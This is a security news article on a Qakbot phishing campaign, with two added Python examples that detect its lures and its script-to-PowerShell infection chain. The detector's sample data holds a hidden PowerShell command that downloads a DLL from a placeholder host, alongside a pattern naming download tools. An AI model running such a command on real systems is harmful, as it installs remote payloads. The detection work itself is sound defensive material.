Researchers are seeing a “significant increase” in attacks deploying the Qakbot malware, which have targeted victims in Germany, Argentina, Italy, Algeria, Spain, the U.S. and other countries with emails containing PDF attachments that deliver the banking trojan.
Qakbot, which was first detected in 2007, has since grown into a multi-purpose malware with multiple functionalities, including tools for performing reconnaissance, exfiltrating data and delivering other payloads. Its modular nature lets it keep pace with the evolving threat landscape, and the malware has recently gained popularity among a variety of threat groups that use either its own capabilities or the second-stage payloads it delivers.
Attackers deploying the malware have previously relied on hijacked email threads (harvested in bulk by exploiting the ProxyLogon vulnerabilities in Microsoft Exchange), as detailed last year by Cisco Talos researchers; this more recent spate of infections relies on a similar method, said researchers with Kaspersky on Monday. Researchers said at least 4,500 spam emails have been sent in this wave of attacks, which they first observed April 4.
“The malware would be delivered through e-mail letters written in different languages — variations of them were coming in English, German, Italian, and French,” said Victoria Vlasova, Andrey Kovtun and Darya Ivanova, researchers with Kaspersky, in a Monday report. “The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own.”
Attackers are using imitations of business emails they gained access to in order to lure users into opening the PDF; the legitimate sender's name populates the "From" field, but the actual email address belongs to a fraudulent account. These emails have a variety of business-related pretexts. In some emails, for instance, attackers asked targets to provide all the documentation pertaining to an attached "application," or to calculate the contract value based on attached "cost estimates."
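The two signals described above, a familiar display name on an unfamiliar sender address and a reply into an existing thread carrying a PDF, can be checked at the mail gateway. The following is an added example, not code from the original article or from Kaspersky; the contact directory, the message and all names and domains in it are constructed for illustration.

```python
"""Flag thread-hijack style lures: a known contact's display name on an
unexpected sender domain, plus reply headers and a PDF attachment."""
from email import message_from_string
from email.utils import parseaddr

# Constructed directory (assumption): display name -> domain we expect that
# person to write from. A real deployment would use the address book or
# prior-correspondence history instead.
KNOWN_CONTACTS = {
    "Anna Schmidt": "example-partner.de",
}

# Constructed sample message, not a real capture. The display name matches a
# known contact but the address is on a look-alike domain, and the mail
# claims to continue an existing thread while carrying a PDF.
SAMPLE_EMAIL = """From: Anna Schmidt <anna.schmidt@mail-lookalike.example>
To: accounting@example.com
Subject: RE: Kostenvoranschlag
In-Reply-To: <original-thread-id@example-partner.de>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please calculate the contract value based on the attached cost estimate.
--b1
Content-Type: application/pdf; name="estimate.pdf"
Content-Disposition: attachment; filename="estimate.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b1--
"""


def analyze(raw_message):
    """Return a dict with the individual findings and an overall verdict."""
    msg = message_from_string(raw_message)
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

    findings = []
    expected = KNOWN_CONTACTS.get(name)
    name_mismatch = bool(expected) and domain != expected
    if name_mismatch:
        findings.append(
            f"display name '{name}' normally writes from @{expected}, "
            f"this message comes from @{domain}"
        )

    in_thread = bool(msg.get("In-Reply-To") or msg.get("References"))
    if in_thread:
        findings.append("message claims to continue an existing thread")

    has_pdf = False
    for part in msg.walk():
        fname = (part.get_filename() or "").lower()
        if part.get_content_type() == "application/pdf" or fname.endswith(".pdf"):
            has_pdf = True
            findings.append(f"PDF attachment: {fname or '(unnamed)'}")

    # A familiar name on a foreign domain is the decisive signal; the thread
    # reply and the PDF raise confidence that this is a lure rather than a
    # contact who simply changed employers.
    if name_mismatch and (has_pdf or in_thread):
        verdict = "suspicious"
    elif name_mismatch:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings, "sender": addr}


if __name__ == "__main__":
    result = analyze(SAMPLE_EMAIL)
    print(result["verdict"])
    for line in result["findings"]:
        print(" -", line)
```

The check deliberately keys on the display name rather than on the address: the attacker controls the address entirely, but must reuse a name the victim recognizes for the lure to work, which is exactly where the mismatch becomes visible.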
“The QBot malware delivery scheme begins with an e-mail letter with a PDF file in the attachment being sent,” said researchers. “The document’s content imitates a Microsoft Office 365 or Microsoft Azure alert advising the user to click Open to view the attached files. If the user complies, an archive will be downloaded from a remote server (compromised site), protected with a password given in the original PDF file.”
The PDF eventually leads to a downloaded archive containing a Windows Script File, which in turn executes a PowerShell script. This script uses wget (in PowerShell, an alias of Invoke-WebRequest) to download a DLL file from a remote server, which eventually delivers Qakbot.
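The execution chain above (Windows Script File host spawning PowerShell, which fetches a DLL) leaves a distinctive parent-child pattern in process-creation telemetry. The following detection logic is an added example, not code from the original article or from Kaspersky; the events are constructed Sysmon-style records, and the host name, paths and the download URL in them are placeholders.

```python
"""Detect a script host (wscript/cscript) launching PowerShell that downloads
a DLL, the chain Kaspersky describes for this Qakbot campaign."""
import ntpath
import re

# Constructed sample process-creation events (Sysmon-style fields). Not a real
# capture; the URL and paths are placeholders. pid 320 is the malicious chain,
# pid 400 is benign interactive PowerShell that must not alert.
SAMPLE_EVENTS = [
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 310, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\Downloads\archive\invoice.wsf"},
    {"pid": 320, "ppid": 310,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"wget http://placeholder.example/x.dll"
                " -OutFile $env:TEMP\\x.dll\""},
    {"pid": 400, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# wget/iwr/curl are PowerShell aliases of Invoke-WebRequest.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|iwr|Invoke-WebRequest)\b", re.IGNORECASE)
DLL_RE = re.compile(r"\.dll\b", re.IGNORECASE)


def image_name(event):
    """Basename of the image path, lower-cased, handling Windows separators."""
    return ntpath.basename(event["image"]).lower()


def ancestry(event, by_pid, limit=10):
    """Image names from the root ancestor down to this process."""
    chain = [image_name(event)]
    cur = event
    while limit and cur["ppid"] in by_pid:
        cur = by_pid[cur["ppid"]]
        chain.append(image_name(cur))
        limit -= 1
    return list(reversed(chain))


def detect(events):
    """Return one alert per PowerShell process that matches the chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if image_name(e) not in POWERSHELL:
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and image_name(parent) in SCRIPT_HOSTS:
            reasons.append(f"spawned by script host {image_name(parent)}")
        if DOWNLOAD_RE.search(e["cmdline"]) and DLL_RE.search(e["cmdline"]):
            reasons.append("command line downloads a DLL")
        if not reasons:
            continue
        # Both signals together match the described chain; either one alone
        # is worth a look but is far noisier in most environments.
        severity = "high" if len(reasons) == 2 else "medium"
        alerts.append({"pid": e["pid"], "severity": severity,
                       "chain": ancestry(e, by_pid), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"], alert["pid"], " -> ".join(alert["chain"]))
        for r in alert["reasons"]:
            print("   ", r)
```

The ancestry walk is what makes the alert actionable: an analyst sees explorer.exe -> wscript.exe -> powershell.exe and immediately knows a user opened a script from a download rather than an administrator running a scheduled task.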
“We have analyzed the Qbot samples from the current e-mail campaign. The bot’s configuration block features company name ‘obama249’ and time stamp ‘1680763529’ (corresponding to April 6, 2023 6:45:29), as well as over a hundred IP addresses the bot will be using to connect to command servers,” said researchers. “Most of these addresses belong to users whose infected systems provide an entry point into the chain which is used to redirect the botnet traffic to real command servers.”
The banking trojan has received various module updates over time to improve its effectiveness, and its distribution methods have also evolved from compromised websites in its early days to phishing and spam campaigns today. However, researchers said that the malware’s functionality has remained mostly unchanged over the past few years.
“As before, the bot is capable of extracting passwords and cookies from browsers, stealing letters from your mailbox, intercepting traffic, and giving operators remote access to the infected system,” said researchers. “Depending on the value of the victim, additional malware can be downloaded locally, such as CobaltStrike (to spread the infection through the corporate network) or various ransomware. Or else the victim’s computer can be turned into a proxy server to facilitate redirection of traffic, including spam traffic.”